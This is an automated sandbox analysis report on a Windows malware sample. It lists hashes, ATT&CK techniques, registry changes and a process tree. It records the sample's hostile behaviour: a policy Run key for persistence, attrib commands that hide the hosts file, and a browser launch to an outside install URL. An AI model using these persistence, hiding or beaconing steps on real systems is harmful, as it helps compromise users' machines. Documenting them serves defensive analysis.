422f8e224315376b6fde3de23b9fcdc9065cd4efd0f733362d942e52dc93ecbe

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
11/07/2024, 13:04

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
Size

45KB
MD5

393bbaf3b37f91f71350b0d90b8c5b8f
SHA1

7cf724468e4d1de2b3e2942d43bbb7a22494dffd
SHA256

422f8e224315376b6fde3de23b9fcdc9065cd4efd0f733362d942e52dc93ecbe
SHA512

f681fcd21bf36d1a8dc4bac4a201d882da287593a739ab09610184ffec207e077eeb6eccc5ec602d35dd8f2a8b1ee7021b3d469d2e3509267833ad9b6f8517b4
SSDEEP

768:QMVvp3w/Tepe4m9OTOeaOluXSCKqeygOS/s+kru/iGFecNHyr4dqbHhGZ+FwdQOp:QMVvp3w/Bz9OT/l2SxqW/yOF46y42oZl

Score

8^/10

evasion persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\qq10000 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe"	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
4808	attrib.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\win.ini	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe

Modifies Internet Explorer settings 1 TTPs 29 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0d7abfb92d3da01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bfd43f7a7cb3b439c96900a06cb1d5a000000000200000000001066000000010000200000002ca1acbb5d1588a56ef596b90f2aa0c5e67d86c5c96f6d65a1615d53520bec0b000000000e8000000002000020000000d86894113f5cc99a6656ab43790d2a3ff3907aea27fb2c2c9bf66ece317dcd0d2000000010dab6cb94a73edfea229f840251dfe85a2d913e0136a8d61172fe0083dc298d40000000546c019cdb9c274d7ee674754ba7c9e665c0f324409be5448cf04d39a31e428630bf6206a34773ef9adb92883c6d2a46d7dee13e41f37004a62ec52e1c5147f3	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bfd43f7a7cb3b439c96900a06cb1d5a00000000020000000000106600000001000020000000141c88099e7b047cebaa56c21f59c7e1560f1035ca0950f1e94c7d461dd13f5e000000000e800000000200002000000095fb467428c9b333d8a384b531025e14cd9db60e70731c8d5851a2f0c227cd0420000000844e02cdd75dfb144562099b9f12be27796e475b8e00b59c4daa8f10404c351540000000d87ea821ae5f88dda051606755970f2bc341d60a5f4d6e50d783d0bfecb969a7592d1a77100430c54e1e0cefe1aa6b674d1f798c88379e1ecc7d7ff9d3ab5328	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31118226"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{26B85675-3F86-11EF-B355-DE54A6AF116A} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4211877670"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118226"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d01ca7fb92d3da01	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4211877670"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: 33	4636	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4636	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
448	iexplore.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
448	iexplore.exe
448	iexplore.exe
2332	IEXPLORE.EXE
2332	IEXPLORE.EXE
2332	IEXPLORE.EXE
2332	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 4004 wrote to memory of 3244	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	86
PID 4004 wrote to memory of 3244	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	86
PID 4004 wrote to memory of 3244	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	86
PID 4004 wrote to memory of 4808	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	88
PID 4004 wrote to memory of 4808	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	88
PID 4004 wrote to memory of 4808	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	88
PID 4004 wrote to memory of 448	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	90
PID 4004 wrote to memory of 448	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	90
PID 448 wrote to memory of 2332	448	iexplore.exe	91
PID 448 wrote to memory of 2332	448	iexplore.exe	91
PID 448 wrote to memory of 2332	448	iexplore.exe	91
PID 4004 wrote to memory of 3520	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	56
PID 4004 wrote to memory of 3520	4004	393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe	56

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3244	attrib.exe
4808	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3520
- C:\Users\Admin\AppData\Local\Temp\393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\393bbaf3b37f91f71350b0d90b8c5b8f_JaffaCakes118.exe"
  2⤵
  - Adds policy Run key to start application
  - Drops file in Drivers directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4004
- - C:\Windows\SysWOW64\attrib.exe
    attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
    3⤵
    - Views/modifies file attributes
    PID:3244
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4808
- - C:\program files\internet explorer\iexplore.exe
    "C:\program files\internet explorer\iexplore.exe" "http://www.qqdcf.com/install.asp?ver=081224&tgid=6688&address=DE-54-A6-AF-11-6A&regk=1&flag=2fbe0cdba112014bee6b56b64c7cae82&frandom=6165"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:448
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:448 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2332

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x300 0x428
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\~DF7A9AFC46B98AD24D.TMP

Filesize
16KB

MD5
35920cec56289f8718b70930d8cbe036

SHA1
9aed6457e4c0eb75df11d9521f8ff3214f376ced

SHA256
6c73bd9c55c2a85d84b69aafcd660ed40a1a7fe70d36b8a47f43fbcbfe6c2185

SHA512
ef0fdd735d95a03a751f42ed99a427f5115f408dcd9cec6ae0456445419cbdb7c1a071f97d38d8d9aca917586470220f2eef20a73dc7343f737cd55bf8a9da70

Download Submit